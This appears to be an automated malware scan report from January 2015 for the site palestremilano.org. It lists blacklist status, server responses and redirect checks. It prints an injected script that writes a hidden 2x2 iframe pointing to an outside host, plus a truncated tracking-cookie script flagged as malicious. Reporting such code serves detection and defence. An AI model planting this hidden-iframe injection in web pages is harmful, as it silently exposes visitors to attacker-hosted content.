Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=palestremilano.org
Result: The website is marked by Google as suspicious: visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://palestremilano.org/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Mon, 12 Jan 2015 22:10:24 GMT Location: http://www.palestremilano.org/ Server: Apache Content-Length: 238 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.palestremilano.org/ | HTTP/1.1 200 OK Date: Mon, 12 Jan 2015 22:10:25 GMT Accept-Ranges: bytes ETag: "86c67b22e5fcd1:4495eb" Server: Microsoft-IIS/6.0 Content-Length: 4824 Content-Location: http://www.palestremilano.org/index.htm Content-Type: text/html Last-Modified: Wed, 11 Jul 2012 06:30:42 GMT MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET | clean |
http://www.palestremilano.org/index.htm | 200 OK Content-Length: 4824 Content-Type: text/html | suspicious |
Suspicious code found:
<script type="text/javascript">
document.write('<iframe src="http://slapfeatureladen.info/in.cgi?16" name="Twitter" scrolling="auto" frameborder="no" align="center" height="2" width="2"></iframe>'); </script>
Hidden iFrame found. size: 2x2 src: http://slapfeatureladen.info/in.cgi?16
<iframe src="http://slapfeatureladen.info/in.cgi?16" name="twitter" scrolling="auto" frameborder="no" align="center" height="2" width="2">
http://codicepro.shinystat.com/cgi-bin/getcod.cgi?USER=palestremilano&P=1 | 200 OK Content-Length: 4187 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below):
<!-- function cCk(nm,vl,mn){var ex=cdm="";var _sscdom="";if (_sscdom && _sscdom!="") { cdm=" domain="+_sscdom; if (mn) {document.cookie=nm+"=; expires=Thu, 01-Jan-70 00:00:01 GMT; path=/;";}}if (mn) {var d=new Date();d.setTime(d.getTime()+(mn*6*1000)); ex="; expires="+d.toGMTString();} document.cookie=nm+"="+vl+ex+"; path=/;"+cdm+"";} function rCk(nm){var nEQ=nm+"=";var ca=document.cookie.split(';');for(var i=0;i<ca.length;i++){var c=ca[i]; while(c.charAt(0)==' ') c=c.subst if (ssqS_.indexOf("NODW=yes")>-1){var ig_=new Image(1,1);ig_.src=ssqS_+"&RM="+Math.round(Math.random()*2147483647);ig_.onload=function(){_ssvoid();}} else{document.write("<a href=\"http://s2.shinystat.com/cgi-bin/shinystatv.cgi?USER="+us_+"&NH=1\" Target=\"_new\"><img src=\""+ssqS_+"\" border=\"0\"/></a>"); }
Antivirus reports:
http://palestremilano.org/index.htm | HTTP/1.1 301 Moved Permanently Connection: close Date: Mon, 12 Jan 2015 22:10:25 GMT Location: http://www.palestremilano.org/index.htm Server: Apache Content-Length: 247 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.palestremilano.org/test404page.js | 404 Not Found Content-Length: 1635 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: palestremilano.org
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Mon, 12 Jan 2015 22:10:24 GMT
Location: http://www.palestremilano.org/
Server: Apache
Content-Length: 238
Content-Type: text/html; charset=iso-8859-1
...238 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: palestremilano.org
Referer: http://www.google.com/search?q=palestremilano.org
Result:
The result is similar to the first query. There are no suspicious redirects found.